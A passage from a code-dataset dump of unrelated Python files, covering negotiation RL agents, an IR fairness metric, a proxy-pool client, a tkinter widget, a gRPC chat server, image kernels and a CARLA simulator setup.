my_turn else self.negotiator\n\n output_predict, output_score = me.speak(self.you, self.eos)\n (me_resp_indices, resp_len), policy_score = self.policy(output_predict, output_score)\n start_with_you = th.autograd.Variable(cu(th.LongTensor([[self.you]])))\n me_resp_indices = th.cat([start_with_you.expand(resp_len.size()[0], 1),\n me_resp_indices], 1)\n me.listen(me_resp_indices, resp_len + 1)\n\n other_resp_indices = self.transform_dialogue(me_resp_indices)\n other.listen(other_resp_indices, resp_len + 1)\n\n dialogue.append(((me_resp_indices if my_turn else other_resp_indices), resp_len))\n policy_scores.append(policy_score)\n if is_selection(me_resp_indices, resp_len, self.sel_token):\n break\n\n my_turn = not my_turn\n\n empty_sel_indices = th.autograd.Variable(cu(th.LongTensor([0])))\n # TODO: epsilon-greedy here too?\n selection_predict, selection_score = self.negotiator.selection(empty_sel_indices,\n feasible_sels,\n num_feasible_sels)\n sel_a = selection_predict['beam']\n sel_b = self.partner.selection(empty_sel_indices,\n feasible_sels, num_feasible_sels)[0]['beam']\n\n reward = compute_reward(sel_a, sel_b, goal_indices)\n partner_reward = compute_reward(sel_b, sel_a, partner_goal_indices)\n\n result = (dialogue, sel_a, sel_b, reward, partner_reward)\n return {'sample': result, 'beam': result}, (th.stack(policy_scores, 0)[:, 0],\n selection_score)\n\n def policy(self, output_predict, output_score):\n if rng.random_sample() <= self.epsilon:\n return output_predict['sample'], output_score['sample']\n else:\n return output_predict['beam'], th.autograd.Variable(cu(th.FloatTensor([0.0])))\n # output_score['beam']\n\n def transform_dialogue(self, resp_indices):\n you, them = th.LongTensor(self.vectorizer.resp_vec.vectorize(['YOU:', 'THEM:'])[0][:2])\n you_mask = (resp_indices == you)\n them_mask = (resp_indices == them)\n transformed = resp_indices.clone()\n transformed[you_mask.data] = them\n transformed[them_mask.data] = you\n return transformed\n\n\ndef is_selection(resp_indices, resp_len, sel_token):\n return resp_indices.data[0, 0] == sel_token and resp_len.data[0] == 1\n\n\ndef compute_reward(sel, other_sel, goal_indices):\n assert goal_indices.size()[1] == NUM_ITEMS * 2, goal_indices.size()\n counts = goal_indices[:, cu(th.LongTensor(range(0, NUM_ITEMS * 2, 2)))]\n values = goal_indices[:, cu(th.LongTensor(range(1, NUM_ITEMS * 2, 2)))]\n total_claimed = sel + other_sel\n # feasible = (total_claimed >= 0).prod() * (total_claimed <= counts).prod()\n feasible = (total_claimed == counts).prod().long()\n\n return ((values * sel).sum(1) * feasible).float()\n","repo_name":"futurulus/negotiation","sub_path":"agents.py","file_name":"agents.py","file_ext":"py","file_size_in_byte":37242,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"26077720077","text":"import numpy as np\nimport general as gen\n# import clsRetrievabilityCalculator as rc\n\n\ndef calculate_fairness(dict_corpus,dict_ret,exposure_operation,fairness_field,fairness_operation):\n\n exposure_result = {}\n exposure_count = {}\n fairness_result = {}\n faieness_val_index = 'rel_sum rel_count'.split().index(fairness_field) + 1\n for docid , val in dict_corpus.items():\n # Get author\n group = val[0]\n # Assign Exposure\n r = dict_ret[docid]\n exposure_result = gen.setVaue(exposure_result,group,r)\n if (exposure_operation == 'mean'):\n exposure_count = gen.setVaue(exposure_count,group,1)\n # Assign Fairness\n if (fairness_operation != 'equal'):\n r = val[faieness_val_index] if (fairness_operation == 'sum') else 1\n fairness_result = gen.setVaue(fairness_result,group,r)\n\n # Exposure\n values = list(exposure_result.values())\n if (exposure_operation == 'mean'):\n values = np.divide(values , list(exposure_count.values()))\n exposure = compute_percent(values)\n\n # Fairness\n values = [1] * len(values) if (fairness_operation == 'equal') else list(fairness_result.values())\n fairness = compute_percent(values)\n result = compute_fairness_score(fairness,exposure)\n return result\n\ndef compute_percent(v):\n total_v = np.sum(v)\n percent_v = np.divide(v , total_v)\n return percent_v\n\ndef compute_fairness_score(a, b):\n c = np.subtract(a,b) # substract\n c = np.power(c,2) # square\n c = np.sum(c) # sum\n score = np.power(c, 0.5) #square root\n return score\n\n\ndef get_fairness_scores(dict_corpus,dict_ret):\n '''\n Calculate Exposure_g\n \tFor each group calculate the sum of the r(d) values\n Then workout the proportion of r(d) for each group g. = Exposure_g\n '''\n\n '''\n Calculate Rel_count_g\n \tFor each group, calculate the count of the #rels for each \n \tgroup g, = Rel_count_g = sum of rel counts for group / total rel count over the collection\n '''\n exposure_operation = ''\n # agg = {rField:'sum' , 'rel_count':'sum'}\n # print('Begin F(Relevance)')\n # fairness_field = 'rel_count'\n # fairness_operation = 'sum'\n # rel_count_exposure = calculate_fairness(dict_corpus,dict_ret,exposure_operation,fairness_field,fairness_operation)\n\n '''\n Calculate Rel_g\n \tFor each group, calculate the sum of the #rels for each \n \tgroup g, = Rel_g = sum of rels for group / total rels over the collection\n '''\n # 1 Fairness(Relevance)\n # print('Begin F(Relevance)')\n fairness_field = 'rel_sum'\n fairness_operation = 'sum'\n rel_sum_exposure = calculate_fairness(dict_corpus,dict_ret,exposure_operation,fairness_field,fairness_operation)\n\n '''\n Calculate Size_g \n For each group, calculate the total group member - \n i.e. the number of documents in the group = Size_g\n '''\n # print('Begin F(Group)')\n # Fairness(Group)\n fairness_field = 'rel_count'\n fairness_operation = 'count'\n size_exposure = calculate_fairness(dict_corpus,dict_ret,exposure_operation,fairness_field,fairness_operation)\n\n '''\n Calculate Group_g\n - [GROUPs] ALL GROUPS ARE EQUAL\n For each group, Group_g = 1/(Number of groups). \n '''\n # Fairness(Equality)\n # print('Begin F(Equality)')\n fairness_field = 'rel_count'\n fairness_operation = 'equal'\n grp_exposure = calculate_fairness(dict_corpus,dict_ret,exposure_operation,fairness_field,fairness_operation)\n\n # print('Begin F(Exposure Mean Over Relevance)')\n exposure_operation = 'mean'\n fairness_field = 'rel_sum'\n fairness_operation = 'sum'\n rel_avg_exposure = calculate_fairness(dict_corpus,dict_ret,exposure_operation,fairness_field,fairness_operation)\n\n\n # rel_sum_exposure,size_exposure,grp_exposure,rel_avg_exposure\n result = [ str(x) for x in [rel_sum_exposure,size_exposure,grp_exposure,rel_avg_exposure]]\n return result\n\ndef get_ret_dict (res_file,b,dict_corpus):\n # Get Document MAP [docid - r]\n\n # df = rc.getRetDf(res_file,b,corpus)\n # dict = df.to_dict('records')\n # return dict\n dict_ret = {}.fromkeys(dict_corpus.keys(),0)\n resF = open(res_file, 'r', encoding='utf-8')\n for line in resF:\n # print(line)\n parts = line.split()\n # qryid = parts[0]\n docid = parts[2]\n rank = int(parts[3])\n r = rank ** -b\n dict_ret[docid] += r\n resF.close()\n return dict_ret\n\n\ndef get_corpus_dict(corpus_file,group):\n # Return MAP [docid - {author,rel_sum,rel_count} ]\n\n f = open(corpus_file,encoding='utf-8')\n # Skip header\n line = f.readline()\n parts = line.replace('\\n','').split(',')\n groupIndex = parts.index(group)\n # Extract Rel_Sum and rel_count fields\n val_slice = [groupIndex,len(parts)-3 , len(parts) - 2]\n result = {}\n # docid,author,pubDate,kicker,byLine,rel_sum,rel_count,length\n for line in f:\n parts = line.split(',')\n key = parts[0]\n val = [parts[index] for index in val_slice]\n result[key] = val\n f.close()\n return result\n\ndef calculate (res_file , group , corpus,b):\n corpus = gen.getCorpus(corpus)\n corpus_file = gen.get_corpus_filename(corpus)\n # MAP [docid - {author - rel_sum - rel_count }\n dict_corpus = get_corpus_dict(corpus_file,group)\n # MAP [docid - r]\n dict_ret = get_ret_dict(res_file,b,dict_corpus)\n line = get_fairness_scores(dict_corpus,dict_ret)\n # Output : rel_sum_exposure,size_exposure,grp_exposure,rel_avg_exposure\n return line\n\n\ndef main():\n res_file = r'C:\\Users\\kkb19103\\Desktop\\test\\WA-BM25-100-200K-baseline.res'\n t1 = gen.getCurrentTime()\n calculate(res_file,'author','w',0.5)\n t2 = gen.getCurrentTime()\n print(t2 - t1)\nif __name__ == '__main__':\n main()","repo_name":"ABDULAZIZALQATAN/IR-Measurements","sub_path":"src/fairnessCalculator.py","file_name":"fairnessCalculator.py","file_ext":"py","file_size_in_byte":5825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43798380284","text":"import json\nimport logging\nimport random\nfrom time import sleep\n\nimport requests\nfrom proxy_pool.ip_pool import ReachMaxException\n\nfrom proxy_pool import IpPool\n\nREQUEST_SUCCESS = 0\nREQUEST_TOO_QUICK = 1\nREQUEST_REACH_MAX = 2\n\n\nclass XunProxy(IpPool):\n def __init__(self, api_url, max_count=5):\n super().__init__(api_url, max_count)\n\n def start(self):\n self._update_ip()\n\n def _request_ip(self):\n res = self.sess.get(self.api_url).content.decode() # 请求ip\n res = json.loads(res) # 解析成字典\n if res['ERRORCODE'] == \"0\":\n with self.cond:\n logging.info(\"请求新的代理IP\")\n ip_port_list = res['RESULT']\n self.ip_pool = set([f\"{ll['ip']}:{ll['port']}\" for ll in ip_port_list])\n self.cond.notify_all()\n logging.info(\"完成请求\")\n return REQUEST_SUCCESS\n elif res['ERRORCODE'] in [\"10036\", \"10038\", \"10055\"]:\n logging.info(\"提取频率过高\")\n return REQUEST_TOO_QUICK\n elif res[\"ERRORCODE\"] == \"10032\":\n logging.info(\"已达上限!!\")\n return REQUEST_REACH_MAX\n","repo_name":"ggqshr/proxy_pool","sub_path":"proxy_pool/xun_proxy.py","file_name":"xun_proxy.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41701132598","text":"\"\"\" This code is taken from https://github.com/xl0418/ABCer/blob/master/Multiple_virusmodels.py \"\"\"\n\nfrom ABCer import ABCer\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef model4(para, time_survey=np.arange(18)):\n # time_survey = np.arange(18)\n y = para[0] * time_survey**3 + para[1] * time_survey**2 + para[2] * time_survey + para[3]\n return y\n\n\nobservations = np.array([\n 1.0, 7.0, 10.0, 24.0, 38.0, 82.0, 128.0, 188.0, 265.0, 321.0, 382.0, 503.0,\n 614.0, 804.0, 959.0, 1135.0, 1413.0, 1705.0\n])\ntime = np.arange(len(observations))\n\ntest_ABC4 = ABCer(50, 10000, observations=observations)\ntest_ABC4.initialize_model(model4)\ntest_ABC4.initialize_parameters([0.0, 1.0, 1.0, 1.0])\ntest_list4 = test_ABC4.ABC(prior_paras=[0.0, 2.0, 1.0, 2.0, 1.0, 2.0, 1.0, 2.0])\n\nplt.plot(time, observations, 'o')\npara_inferred = []\npara_inferred.append(np.mean(test_list4[0][20, :]))\npara_inferred.append(np.mean(test_list4[1][20, :]))\npara_inferred.append(np.mean(test_list4[2][20, :]))\npara_inferred.append(np.mean(test_list4[3][20, :]))\n\nextend_time = np.arange(18)\ny_inferred = model4(para_inferred, np.arange(18))\n\nplt.plot(extend_time, y_inferred, 'x', color='r')\n\nplt.show()","repo_name":"ParkLabML/ABCDP","sub_path":"abcdp/auxiliary_files/COVID_Prediction.py","file_name":"COVID_Prediction.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"9484662208","text":"import tkinter as tk\nfrom tkinter import *\nimport time\nfrom PIL import Image, ImageTk\nimport numpy as np\nimport os\nimport ColorClass\n\nclass IconButton(Frame):\n def __init__(self, parent=None, image=None, fillcolor=None, hovercolor=None, foreground=None, hoverforeground=None, bordercolor=None, activebordercolor=None, text=None, imagedata=None):\n \n if imagedata ==None: \n self.iconPIL = Image.open(image)\n self.icon = ImageTk.PhotoImage(self.iconPIL)\n else:\n self.icon = PhotoImage(data = imagedata)\n Frame.__init__(self, parent)\n self.config(cursor=\"hand2\")\n self.colors2=ColorClass.Midnight()\n self.fillcolor = fillcolor\n self.hovercolor=hovercolor\n self.foreground=foreground\n self.hoverforeground = hoverforeground\n self.bordercolor=bordercolor\n self.activebordercolor=activebordercolor\n self.parent=parent\n self.text=text\n self.config(highlightbackground=self.bordercolor, highlightcolor=self.bordercolor, bg=self.fillcolor)\n self.label = Label(self, relief=FLAT)\n self.label.config(image = self.icon, bg = self.fillcolor, compound = 'left', foreground = self.foreground, wraplength=71, justify=CENTER, text=self.text, font=(\"Segoe UI\", 12, 'roman'))\n self.label.grid(row=1, column=1, sticky='nsew')\n self.bind('', self.hover)\n self.bind('', self.leave)\n self.rowconfigure(1, weight=1)\n\n def hover(self, event):\n self.config(highlightbackground=self.activebordercolor, highlightcolor=self.activebordercolor, bg=self.hovercolor)\n self.label.config(bg = self.hovercolor, foreground = self.hoverforeground)\n def leave(self, event):\n self.config(highlightbackground=self.bordercolor, highlightcolor=self.bordercolor, bg=self.fillcolor)\n self.label.config(bg = self.fillcolor, foreground=self.foreground)\n\n def bind(self, event, command):\n self.label.bind(event, command)\n \n def changeIcon(self, imagepath=None, imageData = None):\n if imagepath != None:\n self.iconPIL = Image.open(imagepath)\n self.icon = ImageTk.PhotoImage(self.iconPIL)\n \n self.label.config(image = self.icon)\n elif imageData != None:\n self.icon = PhotoImage(data = imageData)\n self.label.config(image = self.icon)\n else: \n return\n\n def changeColors(self, newfillcolor, newhovercolor, newforeground, newhoverforeground, newbordercolor, newactivebordercolor):\n self.fillcolor = newfillcolor\n self.hovercolor=newhovercolor\n self.foreground=newforeground\n self.hoverforeground = newhoverforeground\n self.bordercolor=newbordercolor\n self.activebordercolor=newactivebordercolor\n self.config(bg=self.fillcolor, highlightcolor = newactivebordercolor, highlightbackground = newbordercolor)\n self.label.config(bg=self.fillcolor)\n","repo_name":"chartsNgraphs/Python-Chatbot","sub_path":"IconButton.py","file_name":"IconButton.py","file_ext":"py","file_size_in_byte":3010,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"44028004111","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec 4 21:47:36 2016\nQUEUE:\n(i) Noch 1 element möglich:\n<- - -- - -- - - - -> \n..A]|[B][C][D][E][F][G][H][]|[A..\n| ^ End; Hier werden Objekte angehängt\n|\n^ Start; Das Objekt wird ausgegeben\n\nDen Queue kann man als Kreis ansehen. Dabei bewegen sich Anfang und Ende\nunabhängig voneinander - aber abhängig davon wie schnell Aufgaben entnommen bzw\neingefügt werden.\nDer Queue ist voll, wenn das letzte Element belegt ist.\n@author: frye\n\"\"\"\nfrom node import LinkedList\n\nclass Queue(object):\n def __init__(self, n):\n self.start = 0\n self.end = 0\n self.maximum = n\n self.voll = False\n self.queue = LinkedList(None)\n def isEmpty(self):\n \"\"\" Returns if queue is empty\n \"\"\"\n #return self.start == (self.end and not self.voll)\n return self.queue.pointer.value is None\n \n def isFull(self):\n return self.voll\n \n def enqueue(self, element):\n if(self.isFull()):\n return \"Queue is Full\"\n else:\n self.queue.pre(element)\n #oldself.queue[self.end] = element\n # Wenn end == max wird end 0 ansonsten wird es die Zahl\n self.end = (self.end + 1) % self.maximum\n if(self.start == self.end):\n \n self.voll = True\n \n def dequeue(self):\n \"\"\" Returns first element and increses start\n \"\"\"\n if( self.isEmpty()):\n return None\n else:\n self.voll = False\n iVar = self.queue.pointer.value\n self.queue.rm(iVar)\n #iVar = self.queue[self.start]\n self.start = (self.start + 1) % self.maximum\n return iVar\n \n def front(self):\n \"\"\" Return first element\n \"\"\"\n if(self.isEmpty()):\n return None\n else:\n return self.queue.pointer.value\n \n \n \nmyQueue = Queue(10) # Stack fuer 10 Elemente anlegen\n\nfor i in range(12):\n myQueue.enqueue(i)\nfor i in range(12):\n print(str(i)+\" ---> \" + str(myQueue.dequeue()))\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"raviolican/pythonstackQueue","sub_path":"queue.py","file_name":"queue.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1235422200","text":"import asyncio\nimport chat_pb2\nimport chat_pb2_grpc\nimport grpc\nimport time\n\nfrom concurrent import futures\nfrom channel_manager import AbstractChannel, ChannelManager\nfrom google.protobuf.empty_pb2 import Empty\n\n\nclass ChatServicer(chat_pb2_grpc.ChatServicer):\n\n def __init__(self, channel_manager: AbstractChannel):\n assert isinstance(channel_manager, AbstractChannel)\n self.channel_manager = channel_manager\n\n async def CreateChannel(self, request, context: grpc.aio.ServicerContext):\n channel = request.channel\n channel.created_at = int(time.time())\n self.channel_manager.create(channel.id)\n return Empty()\n\n async def ListChannels(self, request, context: grpc.aio.ServicerContext):\n channel_ids = self.channel_manager.list()\n response = chat_pb2.ListChannelsResponse(channel_ids=channel_ids)\n return response\n\n async def SendMessage(self, request, context: grpc.aio.ServicerContext):\n \"\"\"Appends into Channels by channel_id -> Channel by user_id -> Messages. \"\"\"\n message = request.message\n is_broadcast = message.is_broadcast\n if is_broadcast:\n self.channel_manager.broadcast_message(message)\n else:\n self.channel_manager.append_message(message)\n return Empty()\n\n def Stream(self, request, context: grpc.aio.ServicerContext):\n \"\"\"Reads Messages by user_id in Channel by channel_id in Channels if exists.\"\"\"\n user_id = request.user_id\n channel_id = request.channel.id\n\n self.channel_manager.join(user_id, channel_id)\n\n while True:\n if not self.channel_manager.has_message(user_id, channel_id):\n time.sleep(0.1)\n continue\n message = self.channel_manager.pop_message(user_id, channel_id)\n yield chat_pb2.StreamResponse(message=message)\n\n\nasync def serve() -> None:\n servicer = ChatServicer(ChannelManager())\n server = grpc.aio.server(futures.ThreadPoolExecutor(max_workers=10))\n chat_pb2_grpc.add_ChatServicer_to_server(servicer, server)\n\n server.add_insecure_port('[::]:50051')\n await server.start()\n try:\n await server.wait_for_termination()\n except KeyboardInterrupt:\n # Shuts down the server with 0 seconds of grace period. During the\n # grace period, the server won't accept new connections and allow\n # existing RPCs to continue within the grace period.\n await server.stop(0)\n\n\nif __name__ == '__main__':\n asyncio.run(serve())\n","repo_name":"anuscode/grpc-chatting","sub_path":"chat_server.py","file_name":"chat_server.py","file_ext":"py","file_size_in_byte":2535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25689730684","text":"import itertools\nimport numpy as np\nfrom numpy.typing import NDArray\nfrom typing import Callable,Any,List,Tuple\n\ndef extend_image(pixels:NDArray[np.uint8], radius:int) -> NDArray[np.uint8]:\n \"\"\"Extends an image, using the values of the border pixels across the extension.\"\"\"\n padding:List[Tuple[int,int]] = [(0,0)]*len(pixels.shape)\n padding[0] = padding[1] = (radius,radius)\n padded_pixels: NDArray[np.uint8] = np.pad(pixels, padding) # type: ignore\n\n for i in range(0, radius):\n padded_pixels[i] = padded_pixels[radius]\n padded_pixels[:,i] = padded_pixels[:,radius]\n for i in range(-radius, 0):\n padded_pixels[i] = padded_pixels[-radius-1]\n padded_pixels[:,i] = padded_pixels[:,-radius-1]\n\n return padded_pixels\n\ndef boxfilter(pixels:NDArray[np.uint8], radius:int=1):\n \"\"\"Applies a box filter to an image, with a given radius.\"\"\"\n result:NDArray[np.uint16] = np.zeros(pixels.shape, dtype=np.uint16) # type: ignore\n padded_pixels: NDArray[np.uint8] = extend_image(pixels, radius)\n \n get_slice: Callable[[int], slice] = lambda k: slice(radius+k,k-radius if k < radius else None)\n for i,j in itertools.product(range(-radius,radius+1), range(-radius,radius+1)):\n # print(weighted_pixels[sliceX, sliceY,0])\n result += padded_pixels[get_slice(i), get_slice(j)]\n\n return np.array(result / (2*radius + 1)**2 , dtype=np.uint8)\n\n\ndef convolve(pixels:NDArray[np.uint8], kernel:NDArray[Any]) -> NDArray[float]:\n \"\"\"Performs a convolution on a matrix, using the given kernel.\"\"\"\n radius = len(kernel)//2\n result:NDArray[float] = np.zeros(pixels.shape, dtype=float) # type: ignore\n padded_pixels: NDArray[np.uint8] = extend_image(pixels, radius)\n\n get_slice: Callable[[int], slice] = lambda k: slice(radius+k,k-radius if k < radius else None)\n for i,j in itertools.product(range(-radius,radius+1), range(-radius,radius+1)):\n # print(weighted_pixels[sliceX, sliceY,0])\n x = (kernel[radius+i,radius+j]*padded_pixels[get_slice(i), get_slice(j)]).astype(float)\n # print(x.dtype)\n result += x\n\n return result\n\nsobel_kernel_x = 1/8 * np.array([[-1, 0, 1], [-2, 0, 2], [-1, 0, 1]], dtype=np.int8)\nsobel_kernel_y = np.flip(sobel_kernel_x.T)\n\nlaplace_kernel = 1/4 * np.array([[0,-1,0], [-1,4,-1], [0,-1,0]])\ngaussian_kernel = 1/16 * np.array([[1,2,1],[2,4,2],[1,2,1]])\n\ndef sobel_filter(pixels):\n \"\"\"Applies a sobel filter to an image.\"\"\"\n pixels = convolve(pixels, gaussian_kernel)\n\n dx = convolve(pixels, sobel_kernel_x)\n dy = convolve(pixels, sobel_kernel_y)\n\n return np.sqrt(dx**2 + dy**2)\n","repo_name":"angelo-daumas/ImageProcessing","sub_path":"kernels.py","file_name":"kernels.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73437750649","text":"from models.model import CompanyModel\nfrom schemas.company import Company\n\n\nclass CompanyService():\n\n def __init__(self, db) -> None:\n self.db = db\n\n def getCompanies(self):\n result = self.db.query(CompanyModel).all()\n return result\n\n def getCompany(self, id: int):\n result = self.db.query(CompanyModel).filter(\n CompanyModel.id == id).first()\n return result\n\n def createCompany(self, company: Company):\n new_company = CompanyModel(**company.dict())\n self.db.add(new_company)\n self.db.commit()\n return\n\n def updateCompany(self, id: int, data: Company):\n company = self.db.query(CompanyModel).filter(\n CompanyModel.id == id).first()\n company.name = data.name\n company.description = data.description\n company.start_date = data.start_date\n company.country = data.country\n company.cover = data.cover\n self.db.commit()\n return\n\n def deleteCompany(self, id: int):\n self.db.query(CompanyModel).filter(\n CompanyModel.id == id).delete()\n self.db.commit()\n return\n","repo_name":"efdree/py-api-critics","sub_path":"services/company.py","file_name":"company.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19536153871","text":"\n\n\n#%% imports\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n#%% \n\n# an old script to mess with a parametrized logistic curve\n\nX = np.linspace(-5, 5, num = 101)\n\nn_sigma = 3\ny_n = 0.9\n\nr = (1/n_sigma) * np.log(y_n/(1-y_n))\n\nY = 1/(1+np.exp(-r*X))\n\n\n\n\n\n\nplt.figure(figsize = (8, 8))\n\nn_sigma = 3\ny_n = 0.99\nr = (1/n_sigma) * np.log(y_n/(1-y_n))\nY = 1/(1+np.exp(-r*X))\nplt.plot(X, Y, label = f'{n_sigma} {y_n}')\n\n\nn_sigma = 2\ny_n = 0.95\nr = (1/n_sigma) * np.log(y_n/(1-y_n))\nY = 1/(1+np.exp(-r*X))\nplt.plot(X, Y, label = f'{n_sigma} {y_n}')\n\n\nn_sigma = 3\ny_n = 0.95\ntranslate_y = 1\n\nr = (1/n_sigma) * np.log(y_n/(1-y_n))\nY = 1/(1+np.exp(-r*(X-translate_y)))\nplt.plot(X, Y, label = f'{n_sigma} {y_n}')\n\n\nplt.legend(loc = 'best')\nplt.show()\n\n\n\n#%%\n\n\n\n\n#%%\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"yoann-ba/utils_misc","sub_path":"logistic_curve.py","file_name":"logistic_curve.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43500338980","text":"from not_needed_anymore.Joc import Joc\r\n\r\nclass Stare:\r\n \"\"\"\r\n Clasa folosita de algoritmii minimax si alpha-beta\r\n O instanta din clasa stare este un nod din arborele minimax\r\n Are ca proprietate tabla de joc\r\n Functioneaza cu conditia ca in cadrul clasei Game sa fie definiti MIN_PLAYER si MAX_PLAYER (cei doi jucatori posibili)\r\n De asemenea cere ca in clasa Game sa fie definita si o metoda numita mutari() care ofera lista cu configuratiile posibile in urma mutarii unui jucator\r\n \"\"\"\r\n\r\n # TO DO 2\r\n def __init__(self, tabla_joc, j_curent, adancime, parinte=None, estimare=None):\r\n self.tabla_joc = tabla_joc\r\n self.j_curent = j_curent\r\n\r\n # adancimea in arborele de stari\r\n self.adancime = adancime\r\n\r\n # estimarea favorabilitatii starii (daca e finala) sau al celei mai bune stari-fiice (pentru jucatorul curent)\r\n self.estimare = estimare\r\n\r\n # lista de mutari posibile (tot de tip State) din starea curenta\r\n self.mutari_posibile = []\r\n\r\n # cea mai buna mutare din lista de mutari posibile pentru jucatorul curent\r\n # e de tip State (cel mai bun succesor)\r\n self.stare_aleasa = None\r\n\r\n def mutari(self):\r\n l_mutari = self.tabla_joc.all_possible_moves(self.j_curent, ) # lista de informatii din nodurile succesoare\r\n joc_opus = Joc.jucator_opus(self.j_curent)\r\n\r\n # mai jos calculam lista de nodes-fii (succesori)\r\n l_stari_mutari = [Stare(mutare, joc_opus, self.adancime - 1, parinte=self) for mutare in l_mutari]\r\n\r\n return l_stari_mutari\r\n\r\n def __str__(self):\r\n sir = str(self.tabla_joc) + \"(Jucator curent:\" + self.j_curent + \")\\n\"\r\n return sir","repo_name":"Fusneica-FlorentinCristian/FMI-UniBuc","sub_path":"Anul-II/Sem-II/IA/KR/Proiecte/Jocuri/not_needed_anymore/Stare.py","file_name":"Stare.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"ro","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72046926968","text":"import carla\nimport random\nimport math\nimport time\nfrom enum import Enum\nfrom lib.driver import Driver\nfrom lib.nocollide import NoCollide\nfrom lib.data import Speed, Distance\nfrom lib.sim_interfaces import SimSensor, SimSensorGroup\n\n\nclass Scenario(Enum):\n FAST_STATIC = 0\n MID_STATIC = 1\n SLOW_STATIC = 2\n FAST_DYNAMIC = 3\n MID_DYNAMIC = 4\n SLOW_DYNAMIC = 5\n EDGE_CASE_1 = 6\n\n\nclass Simulator(Driver):\n def __init__(self, scen: Scenario):\n self.client = carla.Client('localhost', 2000)\n self.client.set_timeout(2.0) # seconds\n\n self.world = self.client.get_world()\n self.blueprint_library = self.world.get_blueprint_library()\n\n self.map = self.world.get_map()\n\n self.obstacles = []\n\n self.scen = scen\n self.start_coords = {\"x\": 232, \"y\": -40}\n\n self.max_speed = 0\n\n def __enter__(self):\n try:\n self.build()\n except Exception as e:\n self.clear()\n raise e\n\n # self.render_thread.start()\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.clear()\n\n def clear(self):\n if hasattr(self, \"car\"):\n self.car.destroy()\n if hasattr(self, \"left_sensor\"):\n self.left_sensor.destroy()\n if hasattr(self, \"mid_sensor\"):\n self.mid_sensor.destroy()\n if hasattr(self, \"right_sensor\"):\n self.right_sensor.destroy()\n\n for o in self.obstacles:\n o.destroy()\n\n def spawn_car(self, coords, yaw, model=\"cybertruck\") -> carla.Vehicle:\n vehicle_bp = random.choice(self.blueprint_library.filter(f'vehicle.tesla.{model}'))\n transform = carla.Transform(carla.Location(**coords, z=1), carla.Rotation(yaw=yaw))\n car = self.world.spawn_actor(vehicle_bp, transform)\n self.obstacles.append(car)\n return car\n\n def build(self):\n self.clear()\n\n finish = lambda: None\n if self.scen == Scenario.FAST_STATIC:\n self.start_coords = {\"x\": 232, \"y\": 0}\n self.spawn_car({\"x\": self.start_coords[\"x\"], \"y\": self.start_coords[\"y\"] + 130}, 0)\n finish = lambda: self.set_throttle(1.0)\n elif self.scen == Scenario.MID_STATIC:\n self.start_coords = {\"x\": 232, \"y\": 0}\n self.spawn_car({\"x\": self.start_coords[\"x\"], \"y\": self.start_coords[\"y\"] + 60}, 0)\n finish = lambda: self.set_throttle(0.6)\n elif self.scen == Scenario.SLOW_STATIC:\n self.start_coords = {\"x\": 232, \"y\": 0}\n self.spawn_car({\"x\": self.start_coords[\"x\"], \"y\": self.start_coords[\"y\"] + 60}, 0)\n finish = lambda: self.set_throttle(0.3)\n elif self.scen == Scenario.FAST_DYNAMIC:\n self.start_coords = {\"x\": 232, \"y\": -40}\n car = self.spawn_car({\"x\": self.start_coords[\"x\"], \"y\": self.start_coords[\"y\"] + 100}, 90)\n car.apply_control(carla.VehicleControl(throttle=0.5))\n finish = lambda: self.set_throttle(1.0)\n elif self.scen == Scenario.MID_DYNAMIC:\n self.start_coords = {\"x\": 232, \"y\": -40}\n car = self.spawn_car({\"x\": self.start_coords[\"x\"], \"y\": self.start_coords[\"y\"] + 60}, 90)\n car.apply_control(carla.VehicleControl(throttle=0.2))\n finish = lambda: self.set_throttle(0.5)\n\n # Chose a vehicle blueprint at random.\n vehicle_bp = random.choice(self.blueprint_library.filter('vehicle.tesla.model3'))\n transform = carla.Transform(carla.Location(**self.start_coords, z=1), carla.Rotation(yaw=90))\n self.car = self.world.spawn_actor(vehicle_bp, transform)\n\n obstacle_sensor_bp = self.blueprint_library.find(\"sensor.other.obstacle\")\n obstacle_sensor_bp.set_attribute(\"distance\", \"40\")\n obstacle_sensor_bp.set_attribute(\"sensor_tick\", \"0.1\")\n # obstacle_sensor_bp.set_attribute(\"debug_linetrace\", \"True\")\n\n # transform = carla.Transform(carla.Location(x=0.8, y=0.8, z=1), carla.Rotation(yaw=0))\n # self.left_sensor = SimSensor(self.world.spawn_actor(obstacle_sensor_bp, transform, attach_to=self.car))\n # self.left_sensor.listen()\n #\n # transform = carla.Transform(carla.Location(x=-0.8, y=0.8, z=1), 